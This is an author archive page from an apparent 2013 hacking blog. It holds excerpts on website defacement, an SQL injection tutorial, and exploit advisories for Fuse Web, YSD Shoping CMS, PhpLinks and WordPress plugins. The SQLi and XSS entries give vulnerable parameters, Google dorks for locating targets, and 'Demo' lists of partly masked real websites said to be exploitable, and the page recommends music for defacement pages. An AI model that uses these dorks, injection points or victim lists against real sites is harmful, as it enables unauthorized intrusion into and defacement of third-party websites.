1337mir

About 1337mir

This author has not yet filled in any details.
So far 1337mir has created 49 entries.

Anonymous Rap Song

By |October 9th, 2013|

song title: Anonymous Rap Song
singer: unknown
best song ever for website deface page.
youtube video link: http://www.youtube.com/watch?v=yOjpTvfNP8o
screenshot:

Comments Off on Anonymous Rap Song

Whatsapp, Avira and AVG Websites Hacked and Defaced

By |October 8th, 2013|

Whatsapp, Avira and AVG Websites Hacked and Defaced by Anonymous Palestine

The official website of world’s most famous mobile messaging app Whatsapp, anti-virus giant Avira and AVG had their websites defaced by newly emerging group of hackers from Palestine -KDMS, connected with hacktivists Anonymous group.

The hackers left a deface page along with a message on all hacked websites, […]

Comments Off on Whatsapp, Avira and AVG Websites Hacked and Defaced

Basic SQL Injection Tutorial part-1

By |October 8th, 2013|

According to OWASP SQL Injection is the most common technique used by hackers to Deface a website. SQL Injectionis a technique in which the hacker inserts SQL codes into a web Form to get Sensitive information like (User Name , Passwords). I will explain the Various types of SQL Injections.

Things You Should Know
Database: In simple words Database is a collection of data.
Database […]

Comments Off on Basic SQL Injection Tutorial part-1
  • WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-Vulnerability
    Permalink WordPress-Complete-Gallery-Manager-3.3.3-File-Upload-VulnerabilityGallery

    WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

By |October 8th, 2013|

Title: WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability
Date: 013-09-17
References: http://www.vulnerability-lab.com/get_content.php?id=1080
VL-ID: 1080
Common Vulnerability Scoring System: 6.6
Vendor Homepage: http://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606

Introduction:
Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website.
The plugin enables a wealth of functionality, but just because you can take advantage of its many […]

Comments Off on WordPress Complete Gallery Manager 3.3.3 File Upload Vulnerability

Fuse Web SQL Injection Vulnerability

By |October 6th, 2013|

Exploit Title: Fuse Web SQL Injection Vulnerability SQL Injection Vulnerability In FuseWeb

Exploit Author: Ashiyane Digital Security Team
Discovered By : ACC3SS
Software Link : http://www.fuse.no
Google Dork: intext:”Powered by Fuse Web”
Tested on: Windows,Linux
Date : 2013/09/14

Location :
127.0.0.1/path/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
Proof:
http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.X/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwX/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://X.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode=’
http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode=’
http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode=’
 
source:cxsecurity

Comments Off on Fuse Web SQL Injection Vulnerability

YSD Shoping CMS XSS Vulnerability

By |October 6th, 2013|

Exploit Title: YSD Shoping CMS XSS Vulnerability XSS Vulnerability In YSD Shoping CMS Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:”/product_list.php?bid=” , intext:”Designed by YSD”
Tested on: Windows and Linux

Exploit :
http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]
Demo :
www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss

Comments Off on YSD Shoping CMS XSS Vulnerability

PhpLinks Cross Site Scripting Vulnerability

By |October 6th, 2013|

Exploit Title: PhpLinks Cross Site Scripting Vulnerability XSS Vulnerability In PhpLinks Date: 2013 15 September
Author: Arsan
Author email: [email protected]
Author Twitter: @ArsanBlackhat
Vendor Homepage: www.newphplinks.com
Version : All Version
Tested on: Linux & Windows
Category: webapps
Google Keywords:  inurl:”/index.php?PID=” intext:”Powered By phpLinks”

Exploit :
http://127.0.0.1:8081/index.php?PID=[XSS]
http://127.0.0.1:8081/[XSS In SearchBox]

Demo :
www.nXuth.com/index.php?PID=xss
www.eXeli.at/phplinks/index.php?PID=xss
www.ingegnXambientali.it/cercambiente/index.php?PID=xss
www.tourisXfo.it/index.php?PID=xss
www.lupuXnce-timbres.net/index.php?PID=xss
www.links.sXlbard.com/index.php?PID=xss

Comments Off on PhpLinks Cross Site Scripting Vulnerability

What Is Script Kiddie?

By |October 6th, 2013|

In hacker culture a script kiddie or skiddie, also known as 1. skid, 2. script bunny, 3. script kitty. are unskilled individuals who use scripts or programs developed by others to attack computer systems and networks and deface websites. It is generally assumed that script kiddies are juveniles who lack the ability to write […]

Comments Off on What Is Script Kiddie?
  • WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-Vulnerability
    Permalink WordPress-Comment-Attachment-1.0-Cross-Site-Scripting-VulnerabilityGallery

    WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability

By |October 5th, 2013|

Exploit Title: WordPress Comment Attachment 1.0 Cross Site Scripting
Date: 2013 20 September
Author: Arsan
author email: [email protected]
author twitter: @ArsanBlackhat
Software Link: http://wordpress.org/plugins/comment-attachment/
Version : 1.0
Tested on: Linux & Windows
Category: webapps
Google Dork : inurl:”/comment-attachment/comment-attachment.php”
Exploit :
[-] Description :
1) Download “Comment Attachment” And Install
2) Go To Sitting Comment Attachment :
Settings > Discussion > Comment Attachment
3) Insert In “Attachment field title” This […]

Comments Off on WordPress Comment Attachment 1.0 Cross Site Scripting Vulnerability